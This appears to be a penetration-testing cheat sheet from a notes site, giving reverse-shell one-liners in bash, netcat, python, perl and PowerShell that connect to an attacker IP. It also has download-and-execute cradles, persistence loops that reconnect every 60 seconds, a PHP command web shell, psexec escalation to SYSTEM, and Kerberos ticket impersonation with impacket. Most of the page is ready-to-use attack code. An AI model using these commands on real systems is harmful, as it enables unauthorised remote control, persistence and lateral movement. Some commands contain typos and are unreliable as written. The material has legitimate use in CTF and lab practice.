Shell & Stabilization

Reverse Shell

Linux

#Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'

#netcat
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 443 >/tmp/f

#php 
#(with proc_open & proc_close - shell.phar)
<?php

$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);

$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], "nc 127.0.0.1 9001");
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);

$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>


#python injection input
__import__('os').system('whoami')

#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

Windows

#Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File  shell.ps1


#Execute file remotely
IEX (New-Object System.Net.WebClient).DownloaString('http://<attacker ip>/shell.ps1')


# Invoke-PowershellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1

# 1. setup python http server
# 2. execute

powershell.exe IEX(New-Object Net.WebClient).downloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1")
#or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1

# encode payload

Cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le |base64 -w 0

powershell -enc <encode payload>

# Execute command without crashing the previous shell
# 1. pwn.ps1

Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe

# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri <attacker ip>/pwn.ps1 -usebasicparsing)"

# note: you could change the payload in the pwn.ps1 if your payload doesn't work.

Shell Stabilization (Linux)

When?

$ tty
not a tty

Note:

[ctrl + c] only work if machine has bash as the default shell

use "clear" instead.

python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'

Keyboart Shortcut: [Ctrl + Z] (Backgroud Process.)

stty raw -echo ; fg ; reset
stty columns 200 rows 200

Persistence Reverse Shell

Important to run persistence shell before execute anything.

Linux

while :; do setsid bash -i &>/dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done &>/dev/null &


nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &

Windows

need to upload nc.exe

start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"

Web Shell

PHP

cmd --> shell.php

<?php
echo system($_REQUEST['cmd']);
?>

$URL/shell.php?cmd=id

note: the simple way is using burp suite repeater to do a command.

change GET request to POST request to get a better input experience.

IIS

Dig deeper

https://github.com/tennc/webshell

Windows NT Authority shell from Administrator

psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe

Shell to another user in Active Directory

note: powershell

Convert credentials

$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Mangement.Automation.PSCredential "<username>", $pw

Command

Invoke-Command -ComputerName 127.0.0.1 -cred $creds -SCriptBlock { whoami }

after login, run powerview.

Shell with silver ticket

If the domain user has constrained delegation privileges you can use the -impersonate flag to request a ticket on behalf of another user

for example:

# example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator

Request ticket

# username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123


# NTLM Hash
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <ntlm hash>:<ntlm hash>

Save ticket to env 

export KRB5CCNAME=Administrator.ccache

Login with ticket

impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb

Login using Impacket (need local admin creds)

need creds login, try the next command below if you failed on the one command.

# test with crackmapexec smb

impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP

# wmi port
impacket-wmiexec <domain>/<username>@$IP

# test with crackmapexec winrm
evil-winrm

PreviousCrackingNextDatabase

Last updated